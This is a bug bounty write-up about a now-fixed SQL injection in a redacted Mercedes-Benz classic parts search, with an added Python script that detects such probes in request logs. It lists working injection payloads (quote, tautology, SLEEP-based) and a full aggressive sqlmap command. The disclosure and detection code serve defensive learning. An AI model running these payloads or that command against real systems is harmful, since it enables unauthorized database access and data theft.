How I Found a Critical SQL Injection in Mercedes-Benz 🚗💨

By Youssef Ezzat

Hello everyone! 👋 My name is Youssef Ezzat, and I am a Cybersecurity Researcher and Bug Bounty Hunter. I've been diving deep into web security for a while now, and today I'm excited to share my very first write-up with the community.

This story is about how I discovered a critical SQL Injection (SQLi) vulnerability in one of Mercedes-Benz's domains during a Vulnerability Disclosure Program (VDP) engagement.

---

> Disclaimer

This vulnerability was reported responsibly to the Mercedes-Benz security team via Bugcrowd. It has been fixed and resolved. All sensitive details in this write-up, including specific subdomains, have been redacted.


The Reconnaissance

I started my hunting session by picking a target from the Mercedes-Benz scope. My approach is usually to look for functionality that interacts with a database: search bars, filters, and input fields are my best friends.

I came across a subdomain dealing with classic car parts:

https://██████.mercedes-benz-classic.com

The website allowed users to search for specific parts, so I fired up Burp Suite to intercept the traffic and see what was happening behind the scenes.

The Discovery

I navigated to the search page and entered a random search term. The application was sending a POST request to:

POST /███/search

The body contained several parameters, but one stood out:

███Search[search_series]

Step 1: Breaking the Logic

I sent the request to Burp Repeater and added a single quote ' to the parameter:

███Search[search_series]=teste'

Result:

The server responded with a 500 Internal Server Error and leaked a verbose SQL error:

SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax...

🔥 This is the smoke that indicates a fire: the quote closed the string literal early, so the rest of the query no longer parsed.

Step 2: Confirming the Injection

To confirm it wasn't a fluke, I tried injecting a doubled single quote, which SQL treats as one literal quote character inside the string:

███Search[search_series]=tester''

Result:

The server returned a 200 OK with normal content (No results found).

✔️ This confirmed the input was being interpreted by the database: a single quote broke the query, and the escaped form repaired it.

Step 3: Exploitation (Proof of Concept)

After confirming it manually, I used SQLMap to verify the severity and help the security team reproduce the issue.

SQLMap quickly identified:

Boolean-based blind SQLi

Error-based SQLi

Time-based blind SQLi

Backend DBMS: MySQL

This meant an attacker could potentially:

Dump entire database tables

Extract sensitive information

Enumerate schemas, tables, and columns

SQLMap Command Used (PoC)

sqlmap -u "https://██████.mercedes-benz-classic.com/███/search" \
--data="███Search[search_series]=test" \
-p "███Search[search_series]" --risk=3 --level=5 --batch

🧪 Payloads Used

Error Test

teste'

Fixing Query

tester''

Boolean-Based

test' AND 1=1 --

Time-Based

test' AND SLEEP(5) --
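From the defender's side, the four payloads above form a recognisable sequence in request logs: a lone quote that draws a 500, a doubled quote that draws a 200, then a comment-terminated condition and a time-delay call. The following added example (not from the original write-up and not any vendor's tooling) scores parameter values with a few heuristics and spots that error-then-repair pattern per client. The request records, client addresses and field names are constructed for the example; the thresholds are assumptions a team would tune against its own traffic:

```python
import re

# Constructed request records mirroring the probe sequence in the write-up.
# Client addresses, field names and the benign entries are assumptions, not real logs.
SAMPLE_REQUESTS = [
    {"client": "203.0.113.5", "param": "search_series", "value": "W123", "status": 200},
    {"client": "203.0.113.5", "param": "search_series", "value": "teste'", "status": 500},
    {"client": "203.0.113.5", "param": "search_series", "value": "tester''", "status": 200},
    {"client": "203.0.113.5", "param": "search_series", "value": "test' AND 1=1 --", "status": 200},
    {"client": "203.0.113.5", "param": "search_series", "value": "test' AND SLEEP(5) --", "status": 200},
    {"client": "198.51.100.9", "param": "search_series", "value": "O'Brien parts", "status": 200},
]

# (pattern, weight, label): weights are assumptions chosen for this example.
RULES = [
    (re.compile(r"(--|#|/\*)"), 2, "sql comment sequence"),
    (re.compile(r"\b(SLEEP|BENCHMARK|WAITFOR)\s*\(", re.I), 3, "time-delay function"),
    (re.compile(r"\b(AND|OR)\b\s+\d+\s*=\s*\d+", re.I), 2, "tautology condition"),
]


def score_value(value, status):
    """Heuristic score for one parameter value; returns (score, reasons)."""
    score, reasons = 0, []
    for pattern, weight, label in RULES:
        if pattern.search(value):
            score += weight
            reasons.append(label)
    if value.count("'") % 2 == 1:
        # A lone quote is weak evidence by itself (think "O'Brien"), so it only
        # weighs heavily when the application answered with a 500.
        score += 1
        reasons.append("unbalanced quote")
        if status == 500:
            score += 2
            reasons.append("quote followed by 500")
    return score, reasons


def flag_requests(requests, threshold=3):
    """Return (client, param, value, score, reasons) for every request at or above the threshold."""
    flagged = []
    for r in requests:
        score, reasons = score_value(r["value"], r["status"])
        if score >= threshold:
            flagged.append((r["client"], r["param"], r["value"], score, reasons))
    return flagged


def probe_sequences(requests):
    """Clients whose single-quote probe drew a 500 and whose later doubled-quote probe drew a 200.
    The doubled quote alone scores nothing, so only the sequence reveals it."""
    saw_error, confirmed = set(), []
    for r in requests:
        client = r["client"]
        if r["status"] == 500 and r["value"].count("'") % 2 == 1:
            saw_error.add(client)
        elif client in saw_error and r["status"] == 200 and "''" in r["value"] and client not in confirmed:
            confirmed.append(client)
    return confirmed


if __name__ == "__main__":
    for hit in flag_requests(SAMPLE_REQUESTS):
        print("flagged:", hit)
    print("error-then-repair sequence from:", probe_sequences(SAMPLE_REQUESTS))
```

The benign `O'Brien parts` query scores only one point and is left alone, the three noisy payloads are flagged individually, and the `tester''` request, which is harmless on its own, is caught only because the same client triggered a 500 with a single quote just before it. Either signal is a reason to look at the handler behind that parameter, not a reason to block the client outright.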

---

Vulnerable Parameter:

███Search[search_series]

---

🎉 Conclusion

Finding a vulnerability in a giant like Mercedes-Benz was a thrilling experience for me. It reinforced the importance of sanitizing user input, especially in search functionalities.

This journey is just beginning. I learned a lot from this finding, and I can't wait to share more bugs with you all in the future.

If you enjoyed this write-up, feel free to follow me for more security content!

https://www.linkedin.com/in/youssef-ezzat2025

Happy Hacking! 💻🕵️‍♂️

#BugBounty #Cybersecurity #Hacking #AppSec #Infosec #SqlInjection #Mercedes-Benz